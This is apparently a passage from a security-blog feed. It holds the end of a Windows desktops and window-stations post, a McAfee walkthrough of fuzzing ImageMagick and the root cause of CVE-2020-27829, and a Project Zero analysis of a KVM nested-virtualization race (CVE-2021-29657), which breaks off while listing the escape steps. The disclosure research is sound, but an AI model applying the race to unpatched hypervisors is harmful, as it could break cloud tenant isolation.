TID:   3716 PID:  23048 HWND: 0x0000000000192B26 [Touch Tooltip Window] Tooltip
TID:   3716 PID:  23048 HWND: 0x0000000001971B1A [UAC_InputIndicatorOverlayWnd]
TID:   3716 PID:  23048 HWND: 0x00000000002827F2 [UAC Input Indicator]
TID:   3716 PID:  23048 HWND: 0x0000000000142B82 [CiceroUIWndFrame] CiceroUIWndFrame
TID:   3716 PID:  23048 HWND: 0x0000000000032C7A [CiceroUIWndFrame] TF_FloatingLangBar_WndTitle
TID:  51360 PID:  23048 HWND: 0x0000000000032CD4 [Notepad] Untitled - Notepad
TID:   3716 PID:  23048 HWND: 0x0000000000032C8E [CicLoaderWndClass]
TID:  51360 PID:  23048 HWND: 0x0000000000202C62 [IME] Default IME
TID:  51360 PID:  23048 HWND: 0x0000000000032C96 [MSCTFIME UI] MSCTFIME UI

A Notepad window is clearly there. We can repeat the same exercise with the other two desktops, which I have named “Desktop2” and “Desktop3”.

Can we view and interact with these “other” notepads? The SwitchDesktop API exists for that purpose. Given a desktop handle with the DESKTOP_SWITCHDESKTOP access, SwitchDesktop changes the input desktop to the requested desktop, so that input devices redirect to that desktop. This is exactly how the Sysinternals Desktops tool works. I’ll leave the interested reader to try this out.

Window Stations

The last piece of the puzzle is a Window Station. I assume you’ve read my earlier post and understand the basics of Window Stations.

A Thread can be associated with a desktop. A process is associated with a window station, with the constraint being that any desktop used by a thread must be within the process’ window station. In other words, a process cannot use one window station and any one of its threads using a desktop that belongs to a different window station.

A process is associated with a window station upon creation – the one specified in the STARTUPINFO structure or the creator’s window station if not specified. Still, a process can associate itself with a different window station by calling SetProcessWindowStation. The constraint is that the provided window station must be part of the current session. There is one window station per session named “WinSta0”, called the interactive window station. One of its desktop can be the input desktop and have user interaction. All other window stations are non-interactive by definition, which is perfectly fine for processes that don’t require any user interface. In return, they get better isolation, because a window station contains its own set of desktops, its own clipboard and its own atom table. Windows handles, by the way, have Window Station scope.

Just like desktops, window stations can be created by calling CreateWindowStation. Window stations can be enumerated as well (in the current session) with EnumerateWindowStations.

Summary

This discussion of threads, processes, desktops, and window stations is not complete, but hopefully gives you a good idea of how things work. I may elaborate on some advanced aspects of Windows UI system in future posts.

procthreadwin-1

zodiacon

McAfee Blogs
Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829Hardik Shah
30 June 2021 at 15:00

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

McAfee Blogs

By: Hardik Shah

30 June 2021 at 15:00

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure –help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl=g++ CFLAGS=”-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer” LDFLAGS=”-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer” ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would be include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it will instrument each basic block so that it can trace the program execution path. It maintains a shared memory as a bitmap and it uses an algorithm to check new block hits. If a new block hit has been found, it will save this information to bitmap.

Now it may be possible that more than one input file from the corpus can trigger the same path, as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at the runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> — magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized corpus, we can start fuzzing. To fuzz we need to use following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one Master and n number of Slaves. Where n is the available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run master instances, we can use following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

We can run slave instances using following command:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this Fuzzing campaign, we found one crash related to an out of bound read inside a heap memory. We have reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has release a new build with version: 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick with following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past allocated heap buffer and therefore ASAN caused this crash. This can atleast lead to a ImageMagick crash on the systems running vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

Image File Header (IFH) – Contains information such as file identifier, version, offset of IFD.
Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like colormap, page number, BitPerSample, FillOrder,
Bitmap data – Contains various image data like strips, tiles, etc.

We can tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see the following information with tiffinfo like width, height, sample per pixel, row per strip etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, program was crashing at function “PushQuantumPixel” in the following location in quantum-import.c line 256:

On checking “PushQuantumPixel” function in “MagickCore/quantum-import.c” we can see the following code at line #256 where program is crashing:

We can see following:

“pixels” seems to be a character array
inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of “pixels” which means that value is out of bound from the allocated heap memory.

Now we need to figure out following:

What is “pixels” and what data it contains?
Why it is crashing?
How this was fixed?

Finding root cause:

To start with, we can check “ReadTIFFImage” function in coders/tiff.c file and see that it allocates memory using a “AcquireQuantumMemory” function call, which appears as per the documentation mentioned here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”

We can see that “extent” is calculated as following in the code below:

There is a function TIFFStripSize(tiff) which returns size for a strip of data as mentioned in libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224 and we can also see that in the code mentioned above, “image->columns * sizeof(uint64)” is also added to extent, which results in 24 added to extent, so extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels) which is 1 is passed to “AcquireQuantumMemory” function and total memory of 248 bytes get allocated.

This is how memory is allocated.

“Strip_pixel” is pointer to newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain “0xbe” which is default for newly allocated memory by ASAN:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and this is assigned to a variable “p”, as mentioned in below image. Please also note that “p” will be used as a pointer to traverse this memory location going forward in the program:

Later on we see that there is a call to “TIFFReadEncodedPixels” which reads strip data from TIFF file and stores it into newly allocated buffer “strip_pixels” of 248 bytes (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to again refer to TIFF file structure. We can see that there is a tag called “StripOffsets” and its value is 8, which specifies the offset of strip data inside TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside “ReadTIFFImage” function there are two nested for loops.

The first “for loop” is responsible for iterating for “samples_per_pixel” time which is 3.
The second “for loop” is responsible for iterating the pixel data for “image->rows” times, which is 32. This second loop will be executed for 32 times or number of rows in the image irrespective of allocated buffer size .
Inside this second for loop, we can see something like this:

We can notice that “ImportQuantumPixel” function uses the “p” pointer to read the data from “strip_pixels” and after each call to “ImportQuantumPixel”, value of “p” will be increased by “stride”.

Here “stride” is calculated by calling function “TIFFVStripSize()” function which as per documentation returns the number of bytes in a strip with nrows rows of data. In this case it is 14. So, every time pointer “p” is incremented by “14” or “0xE” inside the second for loop.

If we print the image structure which is passed to “ImportQuantumPixels” function as parameter, we can see following:

Here we can notice that the columns value is 3, the rows value is 32 and depth is 9. If we check in the POC TIFF file, this has been taken from ImageWidth and ImageLength and BitsPerSample value:

Ultimately, control reaches to “ImportRGBQuantum” and then to the “PushQuantumPixel” function and one of the arguments to this function is the pixels data which is pointed by “p”. Remember that this points to the memory address which was previously allocated using the “AcquireQuantumMemory” function, and that its length is 248 byte and every time value of “p” is increased by 14.

The “PushQuantumPixel” function is used to read pixel data from “p” into the internal pixel data storage of ImageMagick. There is a for loop which is responsible for reading data from the provided pixels array of 248 bytes into a structure “quantum_Info”. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixels” field.

The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

The program allocates 248 bytes of memory to process strip data for image, a pointer “p” points to this memory.
Inside a for loop this pointer is increased by “14” or “0xE” for number of rows in the image, which in this case is 32.
Based on this calculation, 32*14=448 bytes or more amount of memory is required but only 248 in actual memory were allocated.
The program tries to read data assuming total memory is of 448+ bytes, but the fact that only 248 bytes are available causes an Out of Bound memory read issue.

How it was fixed?

If we check at the patch diff, we can see that the following changes were made to fix this issue:

Here the 2^nd argument to “AcquireQuantumMemory” is multiplied by 2 thus increasing the total amount of memory and preventing this Out of Bound read issue from heap memory. The total memory allocated is 496 bytes, 248*2=496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick 7.0.46 was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below, we can see that there was a call to memset which didn’t set the proper memory size to zero.

Memory was allocated extent*2*sizeof(*strip_pixels) but in this memset to 0 was only done for extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and rest contained 0xbebebebe, which is by default for ASAN new memory allocation.

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing various image files requires deep understanding of various file formats and thus it is possible that something may not be exactly implemented or missed. This can lead to various vulnerabilities in such image processing software. Some of this vulnerability can lead to DoS and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure them. We work very closely with various vendors and do responsible disclosure. This shows McAfee’s commitment towards securing the software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risk arriving from such threats.

We would like to thank and appreciate ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix this issue.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blog.

Google Project Zero
An EPYC escape: Case-study of a KVM breakoutRyan
29 June 2021 at 15:58

An EPYC escape: Case-study of a KVM breakout

Google Project Zero

By: Ryan

29 June 2021 at 15:58

Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerability in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6 and was patched at the end of March 2021. As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM’s architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based API to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMU has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvm or Firecracker have started to become popular.

While KVM’s reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it managable using standard Linux tools.

This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace.

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM’s kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM’s smaller code base makes heavy modifications unlikely (and KVM’s contributor list points at a strong tendency to upstream such modifications when they exist).

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some success with finding vulnerabilities in KVM’s support for nested virtualization on Intel CPUs so reviewing the same functionality for AMD seemed like a good starting point. This is even more true, because the recent increase of AMD’s market share in the server segment means that KVM’s AMD implementation is suddenly becoming a more interesting target than it was in the last years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand it’s becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based Security as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMD and Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it’s part of the attack surface for a malicious or compromised VM.

AMD’s virtualization extension is called SVM (for Secure Virtual Machine) and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer’s Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called “virtual machine control block” (VMCB), which describes the state and configuration of the VM.

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM, sets which VM actions are intercepted to trigger a VM exit and stores some fundamental configuration values such as the page table address used for nested paging.

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, SS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can’t trust the guest provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of the KVM’s code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.c and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

int nested_svm_vmrun(struct vcpu_svm *svm)

{

int ret;

struct vmcb *vmcb12;

struct vmcb *hsave = svm->nested.hsave;

struct vmcb *vmcb = svm->vmcb;

struct kvm_host_map map;

u64 vmcb12_gpa;

vmcb12_gpa = svm->vmcb->save.rax; ** 1 **

ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 **

…

ret = kvm_skip_emulated_instruction(&svm->vcpu);

vmcb12 = map.hva;

if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 **

vmcb12->control.exit_code = SVM_EXIT_ERR;

vmcb12->control.exit_code_hi = 0;

vmcb12->control.exit_info_1 = 0;

vmcb12->control.exit_info_2 = 0;

goto out;

}

...

* Save the old vmcb, so we don't need to pick what we save, but can

* restore everything when a VMEXIT occurs

hsave->save.es = vmcb->save.es;

hsave->save.cs = vmcb->save.cs;

hsave->save.ss = vmcb->save.ss;

hsave->save.ds = vmcb->save.ds;

hsave->save.gdtr = vmcb->save.gdtr;

hsave->save.idtr = vmcb->save.idtr;

hsave->save.efer = svm->vcpu.arch.efer;

hsave->save.cr0 = kvm_read_cr0(&svm->vcpu);

hsave->save.cr4 = svm->vcpu.arch.cr4;

hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

hsave->save.rip = kvm_rip_read(&svm->vcpu);

hsave->save.rsp = vmcb->save.rsp;

hsave->save.rax = vmcb->save.rax;

if (npt_enabled)

hsave->save.cr3 = vmcb->save.cr3;

else

hsave->save.cr3 = kvm_read_cr3(&svm->vcpu);

copy_vmcb_control_area(&hsave->control, &vmcb->control);

svm->nested.nested_run_pending = 1;

if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **

goto out_exit_err;

if (nested_svm_vmrun_msrpm(svm))

goto out;

out_exit_err:

svm->nested.nested_run_pending = 0;

svm->vmcb->control.exit_code = SVM_EXIT_ERR;

svm->vmcb->control.exit_code_hi = 0;

svm->vmcb->control.exit_info_1 = 0;

svm->vmcb->control.exit_info_2 = 0;

nested_svm_vmexit(svm);

out:

kvm_vcpu_unmap(&svm->vcpu, &map, true);

return ret;

}

The function first fetches the value of RAX out of the currently active vmcb (svm->vcmb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_map (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checks is called for some basic validation in 3. Afterwards, the L1 guest context which is stored in svm->vmcb is copied into the host save area svm->nested.hsave before KVM enters the nested guest context by calling enter_svm_guest_mode (4).

int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,

struct vmcb *vmcb12)

{

int ret;

svm->nested.vmcb12_gpa = vmcb12_gpa;

load_nested_vmcb_control(svm, &vmcb12->control);

nested_prepare_vmcb_save(svm, vmcb12);

nested_prepare_vmcb_control(svm);

ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,

nested_npt_enabled(svm));

if (ret)

return ret;

svm_set_gif(svm, true);

return 0;

}

static void load_nested_vmcb_control(struct vcpu_svm *svm,

struct vmcb_control_area *control)

{

copy_vmcb_control_area(&svm->nested.ctl, control);

...

}

Looking at enter_svm_guest_mode we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checks at the beginning of nested_svm_vmrun performs all of its checks on a copy of the VMCB that is stored in guest memory. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.

Let’s look at nested_vmcb_checks to see what kind of checks we can bypass with this approach:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)

{

if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)

return false;

if (control->asid == 0)

return false;

if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&

!npt_enabled)

return false;

return true;

}

At first glance this looks pretty harmless. control->asid isn’t used anywhere and the last check is only relevant for systems where nested paging isn’t supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn’t actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controls simply replicates this behavior. When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact we first need to see how nested vmexit’s are handled in KVM:

The main SVM exit handler is the function handle_exit in arch/x86/kvm/svm.c, which is called whenever a VMexit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this it calls the function nested_svm_exit_handled (5) which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)

{

struct vcpu_svm *svm = to_svm(vcpu);

struct kvm_run *kvm_run = vcpu->run;

u32 exit_code = svm->vmcb->control.exit_code;

…

if (is_guest_mode(vcpu)) {

int vmexit;

trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

vmexit = nested_svm_exit_special(svm);

if (vmexit == NESTED_EXIT_CONTINUE)

vmexit = nested_svm_exit_handled(svm); ** 5 **

if (vmexit == NESTED_EXIT_DONE)

return 1;

}

static int nested_svm_intercept(struct vcpu_svm *svm)

{

// exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun

u32 exit_code = svm->vmcb->control.exit_code;

int vmexit = NESTED_EXIT_HOST;

switch (exit_code) {

case SVM_EXIT_MSR:

vmexit = nested_svm_exit_handled_msr(svm);

break;

case SVM_EXIT_IOIO:

vmexit = nested_svm_intercept_ioio(svm);

break;

…

default: {

if (vmcb_is_intercept(&svm->nested.ctl, exit_code)) ** 7 **

vmexit = NESTED_EXIT_DONE;

}

return vmexit;

}

int nested_svm_exit_handled(struct vcpu_svm *svm)

{

int vmexit;

vmexit = nested_svm_intercept(svm); ** 6 **

if (vmexit == NESTED_EXIT_DONE)

nested_svm_vmexit(svm); ** 8 **

return vmexit;

}

nested_svm_exit_handled first calls nested_svm_intercept (6) to see if the exit should be handled. When we trigger an exit by executing VMRUN in a L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way KVM supports infinite nesting of hypervisors).

However, if the L1 guest exploited the race condition described above svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn’t written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb which contains data for the L2 guest:

* Save the old vmcb, so we don't need to pick what we save, but can

* restore everything when a VMEXIT occurs

hsave->save.es = vmcb->save.es;

hsave->save.cs = vmcb->save.cs;

hsave->save.ss = vmcb->save.ss;

hsave->save.ds = vmcb->save.ds;

hsave->save.gdtr = vmcb->save.gdtr;

hsave->save.idtr = vmcb->save.idtr;

hsave->save.efer = svm->vcpu.arch.efer;

hsave->save.cr0 = kvm_read_cr0(&svm->vcpu);

hsave->save.cr4 = svm->vcpu.arch.cr4;

hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

hsave->save.rip = kvm_rip_read(&svm->vcpu);

hsave->save.rsp = vmcb->save.rsp;

hsave->save.rax = vmcb->save.rax;

if (npt_enabled)

hsave->save.cr3 = vmcb->save.cr3;

else

hsave->save.cr3 = kvm_read_cr3(&svm->vcpu);

copy_vmcb_control_area(&hsave->control, &vmcb->control);

This becomes a security issue due to the way Model Specific Register (MSR) intercepts are handled for nested guests:

SVM uses a permission bitmap to control which MSRs can be accessed by a VM. The bitmap is a 8KB data structure with two bits per MSR, one of which controls read access and the other write access. A 1 bit in this position means the access is intercepted and triggers a vm exit, a 0 bit means the VM has direct access to the MSR. The HPA address of the bitmap is stored in the VMCB control area and for normal L1 KVM guests, the pages are allocated and pinned into memory as soon as a vCPU is created.

For a nested guest, the MSR permission bitmap is stored in svm->nested.msrpm and its physical address is copied into the active VMCB (in svm->vmcb->control.msrpm_base_pa) while the nested guest is running. Using the described double invocation of nested_svm_vmrun, a malicious guest can copy this value into the svm->nested.hsave VMCB when copy_vmcb_control_area is executed. This is interesting because the KVM’s hsave area normally only contains data from the L1 guest context so svm->nested.hsave.msrpm_base_pa would normally point to the pinned vCPU-specific MSR bitmap pages.

This edge case becomes exploitable thanks to a relatively recent change in KVM:

Since commit “2fcf4876: KVM: nSVM: implement on demand allocation of the nested state” from last October, svm->nested.msrpm is dynamically allocated and freed when a guest changes the SVME bit of the MSR_EFER register:

int svm_set_efer(struct kvm_vcpu *vcpu, u64 efer)

{

struct vcpu_svm *svm = to_svm(vcpu);

u64 old_efer = vcpu->arch.efer;

vcpu->arch.efer = efer;

if ((old_efer & EFER_SVME) != (efer & EFER_SVME)) {

if (!(efer & EFER_SVME)) {

svm_leave_nested(svm);

svm_set_gif(svm, true);

... /*

* Free the nested guest state, unless we are in SMM.

* In this case we will return to the nested guest

* as soon as we leave SMM.

if (!is_smm(&svm->vcpu))

svm_free_nested(svm);

} ...

}

For the “disable SVME” case, KVM will first call svm_leave_nested to forcibly leave potential

nested guests and then free the svm->nested data structures (including the backing pages for the MSR permission bitmap) in svm_free_nested. As svm_leave_nested believes that svm->nested.hsave contains the saved context of the L1 guest, it simply copies its control area to the real VMCB:

void svm_leave_nested(struct vcpu_svm *svm)

{

if (is_guest_mode(&svm->vcpu)) {

struct vmcb *hsave = svm->nested.hsave;

struct vmcb *vmcb = svm->vmcb;

...

copy_vmcb_control_area(&vmcb->control, &hsave->control);

...

}

But as mentioned before, svm->nested.hsave->control.msrpm_base_pa can still point to

svm->nested->msrpm. Once svm_free_nested is finished and KVM passes control back to the guest, the CPU will use the freed pages for its MSR permission checks. This gives a guest unrestricted access to host MSRs if the pages are reused and partially overwritten with zeros.

To summarize, a malicious guest can gain access to host MSRs using the following approach:

Enable the SVME bit in MSR_EFER to enable nested virtualization
Repeatedly try to launch a L2 guest using the VMRUN instruction while flipping the INTERCEPT_VMRUN bit on a second CPU core.
